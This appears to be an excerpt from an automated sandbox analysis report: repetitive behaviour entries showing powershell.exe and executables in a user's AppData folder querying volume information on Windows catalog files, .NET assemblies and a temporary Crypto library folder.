Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\LineInst.exeQueries volume information: C:\$Windows.~WS\Sources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\LineInst.exeQueries volume information: C:\$Windows.~WS VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
